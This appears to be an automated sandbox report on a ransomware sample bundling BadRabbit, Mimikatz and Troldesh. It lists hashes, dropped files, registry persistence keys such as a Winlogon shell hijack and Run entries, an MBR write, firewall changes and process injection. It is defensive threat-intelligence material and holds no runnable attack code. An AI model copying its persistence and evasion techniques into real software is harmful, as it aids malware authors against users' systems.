Malware Analysis Report

2024-10-19 00:02

Sample ID 220929-pt4essbhbq
Target Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
SHA256 a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6
Tags
badrabbit mimikatz troldesh bootkit discovery evasion persistence ransomware themida trojan upx
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6

Threat Level: Known bad

The file Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe was found to be: Known bad.

Malicious Activity Summary

badrabbit mimikatz troldesh bootkit discovery evasion persistence ransomware themida trojan upx

Mimikatz

Troldesh, Shade, Encoder.858

BadRabbit

Modifies WinLogon for persistence

mimikatz is an open source tool to dump credentials on Windows

Checks for common network interception software

Enumerates VirtualBox registry keys

Stops running service(s)

UPX packed file

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Modifies Windows Firewall

Executes dropped EXE

Downloads MZ/PE file

Modifies file permissions

Themida packer

Loads dropped DLL

Checks computer location settings

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Modifies WinLogon

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

NSIS installer

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Views/modifies file attributes

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Modifies Internet Explorer start page

Modifies Control Panel

Suspicious use of SetWindowsHookEx

System policy modification

Kills process with taskkill

Creates scheduled task(s)

Suspicious use of UnmapMainImage

Suspicious use of SendNotifyMessage

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Script User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-09-29 12:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-29 12:38

Reported

2022-09-29 12:40

Platform

win7-20220812-en

Max time kernel

32s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

Signatures

BadRabbit

ransomware badrabbit

Mimikatz

mimikatz

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\Temp\\[email protected]" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Troldesh, Shade, Encoder.858

ransomware trojan troldesh

Checks for common network interception software

evasion

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\WINDOWS\302746537.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\AppData\\Local\\Temp\\[email protected]" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Legitimate hosting services abused for malware hosting/C2

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Program Files (x86)\antiviruspc2009\__tmp_rar_sfx_access_check_7109121 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\cscc.dat C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dispci.exe C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\__tmp_rar_sfx_access_check_7108169 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\infpub.dat C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\infpub.dat C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (binary certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 564 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 564 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
